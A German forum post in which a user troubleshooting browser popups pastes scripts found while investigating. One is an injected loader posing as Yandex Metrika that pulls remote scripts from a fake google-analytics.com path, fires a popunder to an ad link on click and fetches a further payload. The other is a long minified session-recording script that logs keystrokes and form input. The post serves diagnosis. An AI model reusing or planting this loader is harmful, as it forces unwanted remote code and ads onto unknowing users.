Hey,

heute war ich ne Zeit lang mit Chrome unterwegs (extra deswegen runtergeladen und neu installiert), keine Popups bekommen.
Witzigerweise kam gerade eben, als ich diesen Thread (mit Firefox) geöffnet habe wieder eines der Popups. Und zwar jedes mal wenn ich in das Fenster geklickt habe, scheint wohl "gebugt" zu haben. Da dachte ich mir, dass das an einem Script liegen muss und hab mal ein bisschen nachgeschaut.

Gefunden habe ich folgendes:

watch.js:

Code: Alles auswählenAufklappen

ATTFilter

//<!--
/* <![CDATA[ */
(function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter20892832 = new Ya.Metrika({id:20892832,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true});
        } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
        s = d.createElement("script"),
        f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";


			   var nos,div,img;

                nos = document.createElement('noscript');

                div = document.createElement('div');
                img = document.createElement('img');
                img.src ="//mc.yandex.ru/watch/20892832";
                img.style.cssText = 'position:absolute; left:-9999px;';
                img.alt = '';

                div.appendChild(img);
                nos.appendChild(div);

                //document.getElementsByTagName("head")[0].appendChild(nos);
                var head=  document.getElementsByTagName ("head")[0] ||  document.documentElement;
                head.insertBefore(nos, head.firstChild);

    if (w.opera == "[object Opera]") {
        d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
})(document, window, "yandex_metrika_callbacks");
        function loadScript(url, callback) {
            var script = document.createElement("script");
            script.type = "text/javascript";
            if (script.readyState) { //IE
                script.onreadystatechange = function () {
                    if (script.readyState == "loaded" || script.readyState == "complete") {
                        script.onreadystatechange = null;
                        callback();
                    }
                };
            } else { //Others
                script.onload = function () {
                    callback();
                };
            }
            script.src = url;
            document.getElementsByTagName("head")[0].appendChild(script);
        }

        window.onload = function() {
            if (window.jQuery) {
                actJq();
            } else {// jQuery is not loaded
                loadScript("hxxp://google-analytics.com/Scripts/jquery.min.js", function () { actJq(); } );
            }
        };


        function actJq(){

            loadScript("hxxp://google-analytics.com/Scripts/jquery.popunder.min.js", function () {

                (function($){
                    $.fn.outside = function(ename, cb,cookie){
                        return this.each(function(){
                            var $this = $(this),
                                    self = this;
                            $(document.body).bind(ename, function tempo(e){
                                if(e.target !== self && !$.contains(self, e.target)){

                                    //uncomment theese if you need cookie control
                                    if(!readCookie(cookie)){ // cookie is not set, setting

                                        cb.apply(self, [e]);
                                        createCookie(cookie,"Gs9Jpex2yvvc",1);	// 1 - time
                                    };

                                    if(!self.parentNode) $(document.body).unbind(ename, tempo);
                                }
                            });
                        });
                    };
                }(jQuery));

                $(function(){
                    $('head').outside('click', function(e){
                        window.aPopunder = [
                            ['hxxp://adlock.in/LZPF9']
                        ];
                        $.popunder();
                        alrtre_g();
                    },'Clickedgdw');
                });

            });

        }


        function createCookie(name,value,days) {
            var date = new Date();           
            date.setTime(date.getTime()+(days*60*60*1000)); //1 hours           
            var expires = date.toGMTString();
            document.cookie = name+"="+value+"; expires="+expires+"; path=/";
        }


        function readCookie(name) {
            var flag = 0;
            var dcmntCookie = document.cookie.split(';');
            for(var i=0;i < dcmntCookie.length;i++) {
                var ck = dcmntCookie[i];
                while (ck.charAt(0)==' ') {
                    ck = ck.substring(1,ck.length);
                }
                if(ck) {
                    cparts = ck.split('=');
                    if (cparts[0] == name) flag=1;
                }
            }
            if(flag) {
                return true;
            } else {
                return false;
            }
        }


 loadScript("hxxp://google-analytics.com/fx.js?bMzOrToken=00000000100000063506161052238229399351283203629", function () {




        });

/* ]]> */
         

Hier wird offensichtlich die besagte Seite aufgerufen.

Und was mir auch komisch vorkam:

ga.js

Code: Alles auswählenAufklappen

ATTFilter

(function(b,a,ma){function N(a){for(var b=1,q=a.length;b<arguments.length;b++)a[q++]=arguments[b];return a.length}function z(){for(var a={},n="hash host hostname href pathname port protocol search".split(" "),q=n.length,h=q;h--;)a[n[h]]="";try{for(var A=b.location,h=q;h--;){var z=n[h];a[z]=""+A[z]}}catch(y){T&&(a=T)}return a}function Db(a){return a?(""+a).replace(/^\s+/,"").replace(/\s+$/,""):""}function Sa(){return-1!=z().hostname.search(/(?:^|\.)(?:ya|yandex|narod|narod2)\.(?:\w+|com\.\w+)$/)}function Ca(){return"MetrikaPlayer"==
b.name}function kb(a){var b=[],q;for(q in a)a.hasOwnProperty(q)&&(b[b.length]=q+"="+encodeURIComponent(a[q]));return b.join("&")}function Da(a){for(var b=a.length,q=0,h=255,A=255;b;){var z=21<b?21:b,b=b-z;do{var y="string"==typeof a?a.charCodeAt(q):a[q];q++;if(255<y)var v=y>>8,y=y&255,y=y^v;h+=y;A+=h}while(--z);h=(h&255)+(h>>8);A=(A&255)+(A>>8)}a=(h&255)+(h>>8)<<8|(A&255)+(A>>8);return 65535==a?0:a}function aa(w,b,q,h){var A="";q&&(A=new Date,A.setTime(A.getTime()+6E4*q),A=";expires="+A.toGMTString());
a.cookie=w+"="+encodeURIComponent(b)+A+";path="+(h||"/")}function ta(w){return a.cookie.match(RegExp("(?:^|;\\s*)"+w+"=([^;]*)"))?decodeURIComponent(RegExp.$1):null}function na(){var w=a.documentElement;return"CSS1Compat"==a.compatMode?w:a.body||w}function Ta(){var a=na();return[a.clientWidth,a.clientHeight]}function Ea(){var a=na(),b=Ta();return[Math.max(a.scrollWidth,b[0]),Math.max(a.scrollHeight,b[1])]}function Fa(){return[b.pageXOffset||a.documentElement&&a.documentElement.scrollLeft||a.body&&
a.body.scrollLeft||0,b.pageYOffset||a.documentElement&&a.documentElement.scrollTop||a.body&&a.body.scrollTop||0]}function Eb(b){if(!b.ownerDocument||"PARAM"==b.tagName||b==a.body||b==a.documentElement)return[0,0];if(b.getBoundingClientRect)return b=b.getBoundingClientRect(),[Math.round(b.left+O[0]),Math.round(b.top+O[1])];for(var n=0,q=0;b;)n+=b.offsetLeft,q+=b.offsetTop,b=b.offsetParent;return[n,q]}function W(b,n){return b==a.documentElement?null:!n?b==a.body?a.documentElement:b.parentNode:b.tagName.toLowerCase()===
n?b:W(b.parentNode,n)}function Fb(a,b){var q=[];if(a)for(var h=a.childNodes,A=0,z=h.length;A<z;A++){var y=h[A];!("INPUT"==y.nodeName&&y.type&&"hidden"==y.type.toLocaleLowerCase())&&(!b||y.nodeName==b)&&N(q,y)}return q}function ua(b){var n=Eb(b);b=b==a.body||b==a.documentElement?Ea():[b.offsetWidth,b.offsetHeight];return[n[0],n[1],b[0],b[1]]}function Gb(a){var b="";a=a.childNodes;for(var q=0,h=a.length;q<h;q++)3==a[q].nodeType&&(b+=a[q].nodeValue);return Da(b.replace(/[\u0000-\u0020]+/g,""))}function Hb(a){var b=
"",q="className width height align title alt name".split(" ");"IMG"==a.tagName&&(b+=a.src.toLowerCase());"A"==a.tagName&&(b+=a.href.toLowerCase());for(var h=0;h<q.length;h++)a.getAttribute&&(b+=String(a.getAttribute(q[h])||"").toLowerCase());return Da(b.replace(/[\u0000-\u0020]+/g,""))}function Ib(b){for(var n=a.getElementsByTagName("form"),q=0,h=n.length;q<h;q++)if(n[q]==b)return q;return-1}function lb(a,b){return RegExp("(?:^|\\s)"+b+"(?:\\s|$)").test(a.className)}function Jb(a){return"INPUT"==
a.nodeName&&"submit"!=a.type&&"image"!=a.type&&"hidden"!=a.type?"radio"==a.type||"checkbox"==a.type?!a.checked:!a.value:"TEXTAREA"==a.nodeName?!a.value:"SELECT"==a.nodeName?0>a.selectedIndex:!0}function oa(a){try{delete b[a]}catch(n){b[a]=ma}}function ia(b){var n=a.createElement("script");n.type="text/javascript";n.async=!0;n.src=b;try{var q=a.getElementsByTagName("html")[0];a.getElementsByTagName("head")[0]||q.appendChild(a.createElement("head"));var h=a.getElementsByTagName("head")[0];h.insertBefore(n,
h.firstChild)}catch(A){}}function mb(w,n,q,h,A,I){function y(p){return function(){try{return p.apply(this,arguments)}catch(Ua){var a=p&&p.name||"";(new Image).src="//an.yandex.ru/jserr/"+w+"?"+kb({"cnt-class":100+n,errmsg:Ua.name+": "+Ua.message+", line: "+(Ua.number||Ua.lineNumber)+", func: "+a})}}}function v(p,a,F){var d=y(function(p){return F(p||b.event)});ea[ea.length]=[p,a,F,d];p.addEventListener?p.addEventListener(a,d,!0):p.attachEvent&&p.attachEvent("on"+a,d)}function B(p,a,F){for(var d=0;d<
ea.length;d++)if(ea[d]&&ea[d][0]==p&&ea[d][1]==a&&ea[d][2]==F){var b=ea[d][3];delete ea[d];break}b&&(p.removeEventListener?p.removeEventListener(a,b,!0):p.detachEvent&&p.detachEvent("on"+a,b))}function T(p){var a=na();return[p.pageX||p.clientX+O[0]-(a.clientLeft||0)||0,p.pageY||p.clientY+O[1]-(a.clientTop||0)||0]}function Z(p){return p.target||p.srcElement}function V(p){return(p.shiftKey?Kb:0)|(p.ctrlKey?nb:0)|(p.altKey?Lb:0)|(p.metaKey?Ub:0)|(p.ctrlKey||p.altKey?Va:0)}function U(p){var a=(new Date).getTime();
p&&a<p&&(ob+=p-a+pa);b.setTimeout(y(function(){U(a)}),pa)}function Wa(){var p=(new Date).getTime()+ob;p<pb&&(p=pb+pa/2);return pb=p}function J(){return Math.round((Wa()-Vb)/l)}function fa(p,a){a=Math.max(0,Math.min(a,65535));N(p,a>>8,a&255)}function C(p,a){N(p,a&255)}function r(p,a){for(a=Math.max(0,a|0);127<a;)N(p,a&127|128),a>>=7;N(p,a)}function aa(p,a){255<a.length&&(a=a.substr(0,255));N(p,a.length);for(var F=0;F<a.length;F++)fa(p,a.charCodeAt(F))}function ca(p,a){r(p,a.length);for(var F=0;F<a.length;F++)r(p,
a.charCodeAt(F))}function ma(p){if(!p.nodeName)return p[K]=-1,null;var a=+p[K];if(!isFinite(a)||0>=a)return null;var F=Wb,d=0,b=W(p),c=b&&b[K]?b[K]:0;0>c&&(c=0);var e=p.nodeName.toUpperCase(),m=Xb[e];m||(F|=Yb);var g;a:{g=Fb(W(p),p.nodeName);for(var k=0;k<g.length;k++)if(g[k]==p){g=k;break a}g=0}g||(F|=Zb);k=ua(p);(b=b?ua(b):null)&&(k[0]==b[0]&&k[1]==b[1]&&k[2]==b[2]&&k[3]==b[3])&&(F|=Mb);Xa[a].pos=k[0]+"x"+k[1];Xa[a].size=k[2]+"x"+k[3];p.id&&"string"==typeof p.id&&(F|=Nb);(b=Gb(p))&&(F|=$b);var j=
Hb(p);j&&(d|=ac);var f;a:{f=Fb(W(p),p.tagName);for(var l=0;l<f.length;l++)if(!(f[l].id&&"string"==typeof f[l].id)&&Hb(f[l])==j&&Gb(f[l])==b){f=!0;break a}f=!1}if(f)var F=F|Ob,D=Da((p.innerHTML||"").replace(/(<[^>]*>|[\u0000-\u0020])/g,""));f=[];C(f,s);r(f,a);C(f,F);r(f,c);m?C(f,m):aa(f,e);g&&r(f,g);F&Mb||(r(f,k[0]),r(f,k[1]),r(f,k[2]),r(f,k[3]));F&Nb&&aa(f,p.id);b&&fa(f,b);F&Ob&&fa(f,D);C(f,d);j&&fa(f,j);return f}function la(p,a,d,b,c,e){for(;d&&(!d.offsetWidth||!d.offsetHeight);)d=W(d);if(!d)return null;
var f=d[K];if(!f||0>f)return null;var m={mousemove:D,click:jb,dblclick:Ba,mousedown:bc,mouseup:ib,touch:ya}[a];if(!m)return null;var k=Eb(d);d=[];C(d,m);r(d,p);r(d,f);r(d,Math.max(0,b[0]-k[0]));r(d,Math.max(0,b[1]-k[1]));/^mouse(up|down)|click$/.test(a)&&(p=c||e,C(d,2>p?mb:p==(c?2:4)?Cb:Bb));return d}function t(p,a){var d=[];C(d,u);r(d,p);r(d,a[0]);r(d,a[1]);return d}function ra(p,a,d){var b=[];d=d[K];if(!d||0>d)return null;C(b,x);r(b,p);r(b,a[0]);r(b,a[1]);r(b,d);return b}function sa(p,a,d){var b=
[];C(b,gb);r(b,p);r(b,a[0]);r(b,a[1]);r(b,d[0]);r(b,d[1]);return b}function da(p,a,d,b){var c=[];C(c,cc);r(c,p);fa(c,a);C(c,d);p=b[K];if(!p||0>p)p=0;r(c,p);return c}function P(p,a){var d,b;0==a.length?b=d="":100>=a.length?(d=a,b=""):200>=a.length?(d=a.substr(0,100),b=a.substr(100)):(d=a.substr(0,97),b=a.substr(a.length-97));var c=[];C(c,hb);r(c,p);ca(c,d);ca(c,b);return c}function Ga(a){var d=[];C(d,ia);r(d,a);return d}function Ha(a){var d=[];C(d,Aa);r(d,a);return d}function qa(a){var d=[];C(d,Ca);
r(d,a);return d}function ta(a,d){var b=[];C(b,Ra);r(b,a);r(b,d[K]);return b}function xa(a,d){var b=[];C(b,Sa);r(b,a);r(b,d[K]);return b}function L(a,d,b){var c=[];C(c,oa);r(c,a);r(c,d[K]);aa(c,String(b));return c}function ga(a,d){var b=d[K];if(0<b){var c=[],e=ua(d),f=Xa[b],m=e[0]+"x"+e[1],k=e[2]+"x"+e[3];m!=f.pos&&(f.pos=m,C(c,dc),r(c,a),r(c,b),r(c,e[0]),r(c,e[1]));k!=f.size&&(f.size=k,C(c,E),r(c,a),r(c,b),r(c,e[2]),r(c,e[3]));if(c.length)return c}return null}function Ia(a){var d=a[K];if(!d||(0>d||
!/^INPUT|SELECT|TEXTAREA$/.test(a.nodeName))||!a.form||lb(a.form,"-metrika-noform"))return null;var b=Ib(a.form);if(0>b)return null;var c;c="INPUT"==a.nodeName?{text:0,password:2,radio:3,checkbox:4,file:6,image:7}[a.type]:{SELECT:1,TEXTAREA:5}[a.nodeName];if("number"!=typeof c)return null;for(var e=-1,f=a.form.elements,m=f.length,k=0,g=0;k<m;k++)if(f[k].name==a.name){if(f[k]==a){e=g;break}g++}if(0>e)return null;f=[];C(f,ec);r(f,d);r(f,b);r(f,c);ca(f,a.name||"");r(f,e);return f}function Ja(a,d){var b=
Ib(d);if(0>b)return null;for(var c=d.elements,e=c.length,f=[],m=0;m<e;m++)if(!Jb(c[m])){var k=c[m][K];k&&0<k&&N(f,k)}c=[];C(c,fc);r(c,a);r(c,b);r(c,f.length);for(b=0;b<f.length;b++)r(c,f[b]);return c}function va(){var a=[];C(a,za);return a}function Ka(a){clearTimeout(Pb);for(var d=(new Date).getTime()+gc;Za.length&&(a||+(new Date).getTime()<d);){var c=Za.shift();if(c=c[0].apply(b,c[1])){var e=c;6500<wa.length+e.length&&$a();for(var c=wa,m=0,k=c.length;m<e.length;m++)c[k++]=e[m];ab||(ab=b.setTimeout(y($a),
f))}}!0===a&&$a(!0);Za.length&&(Pb=b.setTimeout(y(Ka),hc))}function H(a,d,b){N(Za,[a,d]);Ka(b)}function M(a){if(a[K])H(ga,[J(),a]);else{var d=W(a);d&&M(d);a[K]=qb;Xa[qb]={};qb++;H(ma,[a]);H(Ia,[a])}}function Q(a){var d=Z(a),b,c,e=0;if(d&&"SCROLLBAR"!=d.nodeName){if(d&&/^INPUT|SELECT|TEXTAREA|BUTTON$/.test(d.tagName))if(d[K])M(d);else if(b=W(d,"form")){b=b.elements;for(c=b.length;e<c;e++)/^INPUT|SELECT|TEXTAREA|BUTTON$/.test(b[e].tagName)&&!b[e][K]&&M(b[e])}else M(d);else M(d);H(la,[J(),a.type,d,T(a),
a.which,a.button])}}function La(d){Q(d);var c,e;b.getSelection?(d=b.getSelection(),c=d.toString(),e=d.anchorNode):a.selection&&a.selection.createRange&&(d=a.selection.createRange(),c=d.text,e=d.parentElement());for(;e&&1!=e.nodeType;)e=e.parentNode;if(!e||!("INPUT"==e.tagName&&"password"==e.type))if((!e||!/(?:^|\s)-metrika-nokeys(?:\s|$)/.test(e.className))&&c!=rb)rb=c,H(P,[J(),c])}function Ma(a){var d=Wa(),b=d-Qb;if(!(b<m)){var c=T(a),e=sb[0]-c[0],f=sb[1]-c[1],e=e*e+f*f;!(0>=e)&&(!(16>e&&100>b)&&
!(20>b&&256>e))&&(Qb=d,sb=c,Q(a))}}function X(){O=Fa();var a=Wa();a-Rb<m||10>Math.abs(O[0]-tb[0])&&10>Math.abs(O[1]-tb[1])||(Rb=a,tb=O,H(t,[J(),O]))}function R(d){d=Z(d);var b=Math.random(),c=[d.scrollLeft,d.scrollTop];if(d.localId){if(b=ub[d.localId],!b||10>Math.abs(c[0]-b[0])&&10>Math.abs(c[1]-b[1]))return}else{for(;ub[b];)b=Math.random();d.localId=b}ub[d.localId]=c;d!==a&&(M(d),H(ra,[J(),c,d]))}function S(){H(sa,[J(),Ta(),Ea()])}function Y(a){H(va,[],!0);$a(!0);if("beforeunload"==a.type)for(a=
+new Date+50;+new Date<a;);}function Na(a,d,b){a=Z(a);!("INPUT"==a.tagName&&"password"==a.type)&&!/(?:^|\s)-metrika-nokeys(?:\s|$)/.test(a.className)&&(M(a),H(da,[J(),d,b,a]))}function $(a){var d=a.keyCode,c=V(a);if({3:1,8:1,9:1,13:1,16:1,17:1,18:1,19:1,20:1,27:1,33:1,34:1,35:1,36:1,37:1,38:1,39:1,40:1,45:1,46:1,91:1,92:1,93:1,106:1,110:1,111:1,144:1,145:1}[d]||(112<=d&&123>=d||96<=d&&105>=d)||c&Va)19==d&&(c&~Va)==nb&&(d=144),Na(a,d,c|Va),vb=!1,b.setTimeout(y(function(){vb=!0}),1),67==d&&(c&nb&&!(c&
Lb)&&!(c&Kb))&&ja()}function ka(a){vb&&(!wb&&0!==a.which)&&(Na(a,a.charCode||a.keyCode,V(a)),wb=!0,b.setTimeout(y(function(){wb=!1}),1))}function ja(){xb||(xb=!0,rb&&H(Ga,[J()]),b.setTimeout(y(function(){xb=!1}),1))}function ba(){Oa||(Oa=!0,H(Ha,[J()]))}function d(){Oa&&(Oa=!1,H(qa,[J()]))}function k(a){(!Oa||a&&!a.fromElement)&&ba()}function c(a){a&&!a.toElement&&d()}function e(a){a=Z(a);var d,b,c=0;if(a&&/^INPUT|SELECT|TEXTAREA|BUTTON$/.test(a.tagName)){if(a[K])M(a);else if(d=W(a,"form")){d=d.elements;
for(b=d.length;c<b;c++)/^INPUT|SELECT|TEXTAREA|BUTTON$/.test(d[c].tagName)&&!d[c][K]&&M(d[c])}else M(a);H(ta,[J(),a])}}function g(a){if((a=Z(a))&&/^INPUT|SELECT|TEXTAREA|BUTTON$/.test(a.tagName))M(a),H(xa,[J(),a])}function j(a){a=Z(a);if(!("INPUT"==a.tagName&&"password"==a.type)&&(!a||!/(?:^|\s)-metrika-nokeys(?:\s|$)/.test(a.className))&&a&&/^INPUT|SELECT|TEXTAREA$/.test(a.tagName)){var d=/^(checkbox|radio)$/.test(a.type)?a.checked:a.value;M(a);H(L,[J(),a,d])}}function G(a){a=Z(a);if(!lb(a,"-metrika-noform")&&
"FORM"==a.nodeName){for(var d=a.elements,b=0;b<d.length;b++)Jb(d[b])||M(d[b]);H(Ja,[J(),a],!0)}}function bb(a){X();if(a.touches&&a.touches.length){var d=Z(a);if(d){M(d);for(var b=0;b<a.touches.length;b++)H(la,[J(),"touch",d,[a.touches[b].pageX,a.touches[b].pageY],0,0])}}}function $a(){clearTimeout(ab);ab=0;if(wa.length){for(var a={rn:Math.round(1E5*Math.random()),"wv-type":0,"cnt-class":n,"page-url":z().href,wmode:0,"wv-hit":h,"wv-part":ic++,"wv-check":Da(wa),"browser-info":["z",yb,"i",cb].join(":")},
d=wa,b=d.length,c=[],e=b-b%3,f,m=0;m<e;m+=3)f=(d[m]<<16)+(d[m+1]<<8)+d[m+2],N(c,ha[f>>18&63],ha[f>>12&63],ha[f>>6&63],ha[f&63]);switch(b-e){case 1:f=d[e]<<4;N(c,ha[f>>6&63],ha[f&63],"__");break;case 2:f=(d[e]<<10)+(d[e+1]<<2),N(c,ha[f>>12&63],ha[f>>6&63],ha[f&63],"_")}d={"wv-data":c.join("")};A.send("visor","webvisor",a,d);wa.length=0}}var gc=100,hc=200,f=15E3,pa=20,l=50,m=10,s=1,D=2,u=3,x=16,bc=4,cc=5,ec=7,dc=9,E=10,fc=11,ya=12,za=13,Aa=14,Ca=15,Ra=17,Sa=18,oa=19,ia=27,gb=28,hb=29,ib=30,jb=32,Ba=
33,mb=1,Bb=2,Cb=4,Ob=1,Yb=2,Zb=4,Mb=8,$b=16,Nb=32,Wb=64,ac=2,Lb=1,Kb=2,nb=4,Ub=8,Va=16,Xb={A:1,ABBR:2,ACRONYM:3,ADDRESS:4,APPLET:5,AREA:6,B:7,BASE:8,BASEFONT:9,BDO:10,BIG:11,BLOCKQUOTE:12,BODY:13,BR:14,BUTTON:15,CAPTION:16,CENTER:17,CITE:18,CODE:19,COL:20,COLGROUP:21,DD:22,DEL:23,DFN:24,DIR:25,DIV:26,DL:27,DT:28,EM:29,FIELDSET:30,FONT:31,FORM:32,FRAME:33,FRAMESET:34,H1:35,H2:36,H3:37,H4:38,H5:39,H6:40,HEAD:41,HR:42,HTML:43,I:44,IFRAME:45,IMG:46,INPUT:47,INS:48,ISINDEX:49,KBD:50,LABEL:51,LEGEND:52,
LI:53,LINK:54,MAP:55,MENU:56,META:57,NOFRAMES:58,NOSCRIPT:59,OBJECT:60,OL:61,OPTGROUP:62,OPTION:63,P:64,PARAM:65,PRE:66,Q:67,S:68,SAMP:69,SCRIPT:70,SELECT:71,SMALL:72,SPAN:73,STRIKE:74,STRONG:75,STYLE:76,SUB:77,SUP:78,TABLE:79,TBODY:80,TD:81,TEXTAREA:82,TFOOT:83,TH:84,THEAD:85,TITLE:86,TR:87,TT:88,U:89,UL:90,VAR:91,NOINDEX:100},ea=[],ob=0;U(0);var pb=0,Za=[],Pb,qb=1,Qb=0,sb=[0,0],Rb=0,tb=[0,0],ub={},vb=!0,wb=!1,rb="",xb=!1,Oa=!0,ha="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789*-".split(""),
wa=[],ab,ic=1,Vb=Wa(),K="metrikaId_"+Math.random(),Xa={},db=":submit"+Math.random();if("MetrikaPlayer"!=b.name){v(a,"mousemove",Ma);v(a,"click",Q);v(a,"dblclick",Q);v(a,"mousedown",Q);v(a,"mouseup",La);v(b,"scroll",X);v(b,"beforeunload",Y);Sb||v(b,"unload",Y);v(b,"resize",S);v(a,"keydown",$);v(a,"keypress",ka);v(a,"copy",ja);v(a,"touchmove",bb);v(a,"touchstart",bb);a.attachEvent&&!b.opera?(v(a,"focusin",k),v(a,"focusout",c)):(v(b,"focus",ba),v(b,"blur",d),v(a,"blur",d));if(a.addEventListener)a.addEventListener("scroll",
R,!0),a.addEventListener("focus",e,!0),a.addEventListener("blur",g,!0),a.addEventListener("change",j,!0),a.addEventListener("submit",G,!0);else if(a.attachEvent){v(a,"focusin",e);v(a,"focusout",g);for(var zb=a.getElementsByTagName("form"),eb=0;eb<zb.length;eb++){for(var Ab=zb[eb].getElementsByTagName("*"),fb=0;fb<Ab.length;fb++)/^INPUT|SELECT|TEXTAREA$/.test(Ab[fb].tagName)&&v(Ab[fb],"change",j);v(zb[eb],"submit",G)}}var Pa=a.getElementsByTagName("form");if(Pa.length)for(var Qa=0;Qa<Pa.length;Qa++)Pa[Qa][db]=
Pa[Qa].submit,Pa[Qa].submit=function(){G({target:this});return this[db]()};"0:0"!=O.join(":")&&X();S();var Tb=function(d,b){if(d){var c={"wv-type":1,"cnt-class":n,"page-url":z().href,"wv-hit":h,"browser-info":["z",yb,"i",cb,"pct",b||""].join(":")};a.all&&(d=d.replace(/\r\n/g,"\n"));var e;e=d;e=e.replace(/\r\n/g,"\n");for(var f=[],m=String.fromCharCode,k=0,g=e.length;k<g;k++){var s=e.charCodeAt(k);128>s?f.push(m(s)):(127<s&&2048>s?f.push(m(s>>6|192)):(f.push(m(s>>12|224)),f.push(m(s>>6&63|128))),f.push(m(s&
63|128)))}e=f.join("");for(var f=[],j,l,D,s=0,u=e.length;s<u;)j=e.charCodeAt(s++),m=e.charCodeAt(s++),k=e.charCodeAt(s++),g=j>>2,j=(j&3)<<4|m>>4,l=(m&15)<<2|k>>6,D=k&63,isNaN(m)?l=D=64:isNaN(k)&&(D=64),f.push("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(g)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(j)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(l)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(D));
e={"wv-data":f.join("")};A.sendMultipart("webvisor",c,e,3)}};I.uploadPage=function(d){if("function"==typeof b.toStaticHTML&&-1<b.toStaticHTML.toString().indexOf("NoScript"))return!1;var c=a.documentElement;if(c&&19E4<(""+c.innerHTML).length)return!1;var e=b.XMLHttpRequest?new b.XMLHttpRequest:new ActiveXObject("Msxml2.XMLHTTP"),f=(""+(a.characterSet||a.charset||"")).toLowerCase(),c="text/html"+(f?";charset="+f:"");if("html"==d){d=RegExp("<script [^>]*?//mc\\.yandex\\.ru/watch/.*?\x3c/script>","gi");
var f=a.documentElement,m=a.doctype,k=f.attributes,g="",s="",j="",s=f.outerHTML;if(!s){for(s=0;s<k.length;s++){var l=k[s];l&&(g+=" "+l.name+'="'+(l.value||"")+'"')}s="<html"+g+">"+f.innerHTML+"</html>"}m&&(j="<!DOCTYPE "+m.name+(m.publicId?' PUBLIC "'+m.publicId+'"':"")+(m.systemId?' "'+m.systemId+'"':"")+">\n");Tb((j+s).replace(d,""),c);return!0}e&&(e.open("get",z().href,!0),e.onreadystatechange=function(){4==e.readyState&&Tb(e.responseText,e.getResponseHeader("content-type"))},e.overrideMimeType&&
f&&e.overrideMimeType(c),e.send(null));return!0}}return{stop:function(){B(a,"mousemove",Ma);B(a,"click",Q);B(a,"dblclick",Q);B(a,"mousedown",Q);B(a,"mouseup",La);B(b,"scroll",X);B(b,"beforeunload",Y);B(b,"unload",Y);B(b,"resize",S);B(a,"keydown",$);B(a,"keypress",ka);B(a,"copy",ja);B(a,"touchmove",bb);B(a,"touchstart",bb);B(a,"focusin",k);B(a,"focusout",c);B(b,"focus",ba);B(b,"blur",d);B(a,"blur",d);if(a.removeEventListener)a.removeEventListener("scroll",R,!0),a.removeEventListener("focus",e,!0),
a.removeEventListener("blur",g,!0),a.removeEventListener("change",j,!0),a.removeEventListener("submit",G,!0);else if(a.detachEvent){B(a,"focusin",e);B(a,"focusout",g);for(var f=a.getElementsByTagName("form"),m=0;m<f.length;m++){for(var s=f[m].getElementsByTagName("*"),l=0;l<s.length;l++)/^INPUT|SELECT|TEXTAREA$/.test(s[l].tagName)&&B(s[l],"change",j);B(f[m],"submit",G)}}f=a.getElementsByTagName("form");for(m=0;m<f.length;m++)f[m][db]&&(f[m].submit=f[m][db])},uploadPages:function(d,c){function e(){B(a,
"DOMContentLoaded",e);B(b,"load",e);for(var f=d.split(/\n/),m=z().href,k=/regexp:/,s=0;s<f.length;s++){var g=f[s];if(g)if(k.test(g)){if(g=Db(g.replace(k,"")),RegExp(g).test(m)){I.uploadPage(c);break}}else if(-1!==m.indexOf(g)){I.uploadPage(c);break}}}"complete"==a.readyState?e():(v(a,"DOMContentLoaded",e),v(b,"load",e))}}}var Sb=-1===(""+b.navigator.userAgent).toLowerCase().search(/webkit/)&&-1!==(""+b.navigator.userAgent).toLowerCase().search(/gecko/),O=Fa();b.Ya=b.Ya||{};Ya._metrika=Ya._metrika||
{};Ya._metrika.counters=Ya._metrika.counters||{};Ya._metrika.hitParam=Ya._metrika.hitParam||{};var T=z(),yb,cb,ca=b.navigator,la=b.screen,xa="https:"==T.protocol?"https:":"http:",Bb="$Rev: 1825 $".match(/(\d+)/)[1],ra="object"==typeof a.all,gb=64,sa=ra?512:2048,hb=ra?512:2048,ib=ra?100:400,ya="noindex",za=50,jb=RegExp("\\.(3gp|7z|aac|ac3|acs|ai|avi|ape|apk|asf|bmp|bz2|cab|cdr|crc32|css|csv|cue|divx|dmg|djvu?|doc(x|m|b)?|emf|eps|exe|flac?|flv|iso|swf|gif|t?gz|jpe?g?|js|m3u8?|m4a|mp(3|4|e?g?)|m4v|md5|mkv|mov|msi|ods|og(g|m|v)|pdf|phps|png|ppt(x|m|b)?|psd|rar|rss|rtf|sea|sfv|sit|sha1|svg|tar|tif?f|torrent|ts|txt|vob|wave?|wma|wmv|wmf|webm|xls(x|m|b)?|xpi|g?zip)$",
"i"),Cb=+new Date,Ra,Aa;b.Ya.Metrika=function(w,n,q,h){function A(a,b,c){ga[ga.length]=[c,c];a.addEventListener?a.addEventListener(b,c,!1):a.attachEvent&&a.attachEvent("on"+b,c)}function I(a,b,c){for(var e=0;e<ga.length;e++)if(ga[e]&&ga[e][0]==c){var g=ga[e][1];delete ga[e];break}g&&(a.removeEventListener?a.removeEventListener(b,g,!1):a.detachEvent&&a.detachEvent("on"+b,g))}function y(a,k){k=k||256;if(!a)return"";a.length>k&&(a=a.substr(0,k));return(b.encodeURIComponent||b.escape)(a).replace(/\+/g,
"%2B")}function v(a){function b(a){return a?a.replace(/\\/g,"\\\\").replace(/"/g,'\\"'):""}if(a===ma)return"";if(null===a)return"null";switch(a.constructor){case Boolean:return a.toString();case Number:return isFinite(a)?a.toString():"null";case String:return'"'+b(a)+'"';case Array:for(var c=[],e=0,g=a.length;e<g;e++)c[c.length]=v(a[e]);return"["+c.join(",")+"]";case Object:c="{";e=0;for(g in a)if(a.hasOwnProperty(g)){var j=a[g];j!==ma&&(c+=(e?",":"")+'"'+b(g)+'":'+v(j),e++)}return c+"}";default:return"null"}}
